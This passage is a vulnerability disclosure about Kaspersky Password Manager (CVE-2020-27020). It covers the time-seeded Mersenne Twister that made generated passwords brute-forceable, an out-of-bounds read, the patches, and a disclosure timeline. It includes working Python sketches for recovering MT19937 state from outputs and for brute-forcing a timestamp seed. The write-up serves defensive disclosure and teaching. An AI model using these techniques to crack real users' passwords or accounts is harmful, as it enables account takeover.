  • The Web version used Math.random(). This function is not suitable to generate cryptographically secure random numbers (which includes the entropy required to generate passwords), as explained in https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Math/random. The underlying PRNG used by Chrome, Firefox and Safari for Math.random() is xorshift128+. It is very fast, but not suitable to generate cryptographic material. The security consequences in KPM have not been studied, but we advised Kaspersky to replace it with window.crypto.getRandomValues(), as recommended by the Mozilla documentation page previously mentioned.
  • The desktop version used a PRNG provided by Boost: the mt19937 Mersenne Twister. The Mersenne Twister is a very good and widely used PRNG, and MT19937 is the most popular Mersenne Twister. It is uniformly distributed, has a very long period, and is fast compared to the other “good” PRNGs.

However, is using a Mersenne Twister a good idea to create passwords? Definitely not.

The problem with this generator is that it is not a CSPRNG. Knowing a few of its outputs (624 in this case) allows one to retrieve its full state, and to predict all the values it will generate, plus all the values it has already generated (see the Berlekamp-Massey or Reeds-Sloane algorithms).

Off-the-shelf tools like randcrack are available to break Python's random module, which uses a very similar (if not the same) implementation of MT19937. Only very minor adaptations should be necessary to break Boost's implementation.
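To make the state-recovery claim concrete, here is a Python sketch against Python's own MT19937 (the random module), not Boost's. It uses a different technique than the Berlekamp-Massey or Reeds-Sloane algorithms cited above: it directly inverts MT19937's output tempering, the same general idea behind tools like randcrack. It only predicts future outputs; recovering earlier ones would additionally require inverting the state update. The helper names are hypothetical.

```python
import random


def undo_xor_rshift(y: int, shift: int) -> int:
    """Invert y = x ^ (x >> shift) for a 32-bit x; each pass fixes `shift` more high bits."""
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ (x >> shift)
    return x


def undo_xor_lshift_mask(y: int, shift: int, mask: int) -> int:
    """Invert y = x ^ ((x << shift) & mask); each pass fixes `shift` more low bits."""
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ ((x << shift) & mask)
    return x


def untemper(y: int) -> int:
    """Undo MT19937's four tempering steps in reverse order, giving a raw state word."""
    y = undo_xor_rshift(y, 18)
    y = undo_xor_lshift_mask(y, 15, 0xEFC60000)
    y = undo_xor_lshift_mask(y, 7, 0x9D2C5680)
    y = undo_xor_rshift(y, 11)
    return y


# The "victim" generator; the attacker only sees its 32-bit outputs.
victim = random.Random(1337)
observed = [victim.getrandbits(32) for _ in range(624)]

# Rebuild the 624-word state and install it in a fresh generator.
# Index 624 forces a full state update (twist) before the next output.
clone = random.Random()
clone.setstate((3, tuple(untemper(v) for v in observed) + (624,), None))

predicted = [clone.getrandbits(32) for _ in range(5)]
actual = [victim.getrandbits(32) for _ in range(5)]
print(predicted == actual)  # True
```

Any 624 consecutive outputs work, since MT19937's state is a sliding window over its output sequence.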

In practice, exploiting such a flaw in the context of Kaspersky Password Manager is hard:

  • Passwords are short: 12 chars by default. Retrieving 624 password chars requires grabbing 52 passwords.
  • The raw output value is not known: the output value is the position in the charset of each letter of the password. More values could be necessary.
  • And we saw that this position in the charset is derived from the product of two values produced by the PRNG.

We do not see a straightforward way to attack this PRNG in the context of KPM.

Seeding the Mersenne Twister

We saw that the PRNG uniformly generates floats in [0, 1[. The code responsible for its initialization should look like:


mt19937::result_type seed = ...;
auto mtrand = std::bind(std::uniform_real_distribution<float>(0,1), mt19937(seed));

Where does the seed come from? The password generation function is called like this:


std::string pwlib::generatePassword(pwdlib::Policy policy, int seed)
{
    if (seed == 0) {
        FILETIME ft;

        GetSystemTimeAsFileTime(&ft);
        seed = ft.dwLowDateTime + ft.dwHighDateTime;
    }
    auto mtrand = std::bind(std::uniform_real_distribution<float>(0,1), mt19937(seed));
    return generateRandomPassword(policy, mtrand);
}

This is super interesting for two reasons:

  • The seed is just 32 bits. That means it can be bruteforced easily.
  • An instance of the PRNG is created every time a password is generated. It means Kaspersky Password Manager can generate at most 2^32 passwords for a given charset.

GetSystemTimeAsFileTime is used as a seed only if no seed is provided to the generatePassword method (that is, if seed is 0). How is this method called when a user requests a new password? The answer is:


std::string pwlib::generatePassword(pwdlib::Policy policy)
{
  return generatePassword(policy, time(0));
}

So the seed used to generate every password is the current system time, in seconds. It means every instance of Kaspersky Password Manager in the world will generate the exact same password at a given second. This would be obvious to spot if every click on the “Generate” button, in the password generator interface, produced the same password. However, for some reason, password generation is animated: dozens of random chars are displayed while the real password has already been computed:

Animated password generation

This animation takes more than 1 second, so it is not possible to click several times on the “Generate” button within a second. That is definitely why the weakness had not been discovered before.

The consequences are obviously bad: every password could be bruteforced. For example, there are 315619200 seconds between 2010 and 2021, so KPM could generate at most 315619200 passwords for a given charset. Bruteforcing them takes a few minutes.

It is quite common that Web sites or forums display the creation time of accounts. Knowing the creation date of an account, an attacker can try to bruteforce the account password with a small range of passwords (~100) and gain access to it.
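The attack boils down to replaying the generator for every candidate second. The Python sketch below uses a hypothetical stand-in generator (toy_generate): KPM's real algorithm, with its frequency-based charset ordering, is not reproduced, and Python's random module seeds MT19937 differently from Boost's mt19937(seed). What carries over is the structure: when the seed is the timestamp, a window of candidate seconds fully determines the candidate passwords.

```python
import random
import string

CHARSET = string.ascii_lowercase


def toy_generate(seed: int, length: int = 12) -> str:
    """Hypothetical stand-in for a generator seeded with time(0); not KPM's algorithm."""
    rng = random.Random(seed)
    return "".join(CHARSET[int(rng.random() * len(CHARSET))] for _ in range(length))


def recover_seed(password: str, start: int, end: int):
    """Try every second in [start, end]; return the seed that reproduces password, or None."""
    for candidate in range(start, end + 1):
        if toy_generate(candidate, len(password)) == password:
            return candidate
    return None


# The victim generates a password at some second; the attacker only knows
# a window of about 100 seconds around the account creation time.
created_at = 1_600_000_042
password = toy_generate(created_at)
print(recover_seed(password, 1_600_000_000, 1_600_000_100))
```

The same loop over roughly 315 million seconds is what makes exhaustively listing every possible password practical.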

Moreover, passwords from leaked databases containing hashed passwords, passwords for encrypted archives, TrueCrypt/VeraCrypt volumes, etc. can also be easily retrieved if they had been generated using Kaspersky Password Manager.

An unexpected source of entropy: out-of-bounds read

We wrote a proof of concept to make sure we were not missing something. It generates a list of 1000 possible passwords from the current time. To test the PoC:

  1. Compile the provided PoC (pwlib.cpp). The file must be compiled with Visual C++ (floating-point values in the source code do not have exactly the same values when compiled with Clang or gcc). I used Visual C++ 2017 for my tests. In a 32-bit Visual C++ command prompt, enter:
     cmake -Bbuild -H.
     msbuild build\pwbrute.vcxproj
  2. Run the compiled executable to create a list of 1000 passwords:
     Debug\pwbrute.exe > pass.txt
  3. Create a password in Kaspersky Password Manager with the following policy:
    • Lowercase only
    • 12 chars
  4. Verify that the generated password is indeed present in pass.txt.

It is not completely functional, but it allowed us to discover a bug in the password generation process, in the function that computes the probability of appearance of a given letter given the previously generated chars. Here is the pseudocode for the getContextProbabilities method:


  const float *getContextProbabilities(const std::string &password) {
    std::string lowercasePassword;

    // Convert to lowercase, keep only lowercase
    for (char c : password) {
      if (islower(c)) {
        lowercasePassword += c;
      } else if (isupper(c)) {
        lowercasePassword += char(c - 'A' + 'a');
      }
    }
...
    int n = 0;
    for (int i = lowercasePassword.length() - 1; i >= 0; i--) {
      int index = password[i] - 'a'; // FIXME: replace with lowercasePassword
      ...
    }
    ...
  }

The password being built is converted to lowercase, and non-letters are removed. However, the loop then iterates over the original password instead of the lowercase password just created. This leads to a wrong computation of the index variable (the position of a letter in the alphabet). This index is used to retrieve an element of an array, which leads to an out-of-bounds read of this array.
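The effect of the FIXME can be reproduced on the index computation alone. The Python sketch below is a hypothetical reconstruction of just those lines (it does not model KPM's probability tables): it compares the index values the buggy loop reads with the intended ones.

```python
def letters_lowercased(password: str) -> str:
    """First loop of getContextProbabilities: keep ASCII letters only, lowercased."""
    return "".join(c.lower() for c in password if c.isascii() and c.isalpha())


def buggy_indices(password: str) -> list[int]:
    # Loop bound comes from the filtered string, characters from the original one.
    letters = letters_lowercased(password)
    return [ord(password[i]) - ord("a") for i in range(len(letters) - 1, -1, -1)]


def fixed_indices(password: str) -> list[int]:
    # What the FIXME asks for: read from the filtered, lowercased string.
    letters = letters_lowercased(password)
    return [ord(letters[i]) - ord("a") for i in range(len(letters) - 1, -1, -1)]


print(buggy_indices("aB3c"))  # [-46, -31, 0]
print(fixed_indices("aB3c"))  # [2, 1, 0]
```

Any index outside 0..25 falls outside a table indexed by alphabet position; for lowercase-only passwords both strings are identical, which is why the PoC sticks to them.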

In some cases, the frequencies of appearance are then computed from uninitialized or arbitrary data. Although the algorithm is wrong, this actually makes the passwords harder to bruteforce in some cases.

The attached PoC generates candidates for lowercase-only passwords, so that the index is always computed correctly (otherwise the PoC would need to be adapted).

Remediation

Kaspersky assigned CVE-2020-27020 to this vulnerability, and published a security advisory on their web page: https://support.kaspersky.com/general/vulnerability.aspx?el=12430#270421.

All versions prior to the following ones are affected:

  • Kaspersky Password Manager for Windows 9.0.2 Patch F
  • Kaspersky Password Manager for Android 9.2.14.872
  • Kaspersky Password Manager for iOS 9.2.14.31

On Windows, the Mersenne Twister PRNG has been replaced with the BCryptGenRandom function:


float RandomFloat(BCRYPT_ALG_HANDLE *hAlgorithm) {
    uint32_t l;
    BCryptGenRandom(*hAlgorithm, (uint8_t *)&l, sizeof(l), 0);
    return (float)l * (1.0f / 0x100000000);
}

The return value of BCryptGenRandom was not checked in the beta versions provided by Kaspersky, but we assume this has since been fixed.

In the Web version, Math.random() has been replaced with the secure window.crypto.getRandomValues() method.

Android and iOS versions have also been patched, but we have not looked at the fixes.

Conclusion

Kaspersky Password Manager used a complex method to generate its passwords. This method aimed to create passwords that are hard to break for standard password crackers. However, such a method lowers the strength of the generated passwords against dedicated tools. We showed how to generate secure passwords, taking KeePass as an example: simple methods like random draws are secure, as long as you get rid of the “modulo bias” when picking a letter from a given range of chars.

We also studied Kaspersky’s PRNG and showed that it was very weak. Its internal structure, a Mersenne Twister taken from the Boost library, is not suited to generating cryptographic material. But the major flaw is that this PRNG was seeded with the current time, in seconds. That means every password generated by vulnerable versions of KPM can be bruteforced in minutes (or in a second if you know approximately the generation time).

Finally, we provided a proof of concept that details the full generation method used by KPM. It can be used to verify that the flaw is indeed present in Windows versions of Kaspersky Password Manager < 9.0.2 Patch F. Incidentally, writing this PoC allowed us to spot an out-of-bounds read during the computation of the frequency of appearance of password chars, which makes passwords a bit stronger than they should have been.

Timeline

  • June 15, 2019: report and proof of concept sent to Kaspersky through HackerOne.
  • June 17, 2019: Kaspersky acknowledges it has received the report.
  • June 25, 2019: Kaspersky confirms the vulnerability.
  • October 4, 2019: Kaspersky sends a private Windows build so we can check the bugs have been fixed, and informs us they will roll out a solution to handle previously generated passwords before the end of the year.
  • October 8, 2019: we confirm the vulnerabilities have been fixed, but report a new small defect in the fix.
  • October 9, 2019: Kaspersky Password Manager for Android version 9.2.14.872 with the fix is released.
  • October 10, 2019: Kaspersky Password Manager for Windows 9.0.2 Patch D is released, fixing the vulnerabilities, but without the fix for the reported defect. The Web version is also updated.
  • October 10, 2019: Kaspersky Password Manager for iOS version 9.2.14.31 with the fix is released.
  • December 10, 2019: Kaspersky Password Manager for Windows 9.0.2 Patch F is released closing the defect in patch D.
  • April 9, 2020: Kaspersky informs us they will release a patch in October to handle previously generated passwords.
  • October 13, 2020: Kaspersky Password Manager 9.0.2 Patch M is released, with a notification informing users that some passwords must be regenerated. Kaspersky informs us the same notification will also be present in mobile versions during the first quarter of 2021. CVE-2020-27020 has also been reserved.
  • December 28, 2020: Kaspersky agrees that a report about the vulnerability can be disclosed after the CVE is published.
  • April 27, 2021: Kaspersky security advisory is published.
  • May 14, 2021: Information for the CVE-2020-27020 is published.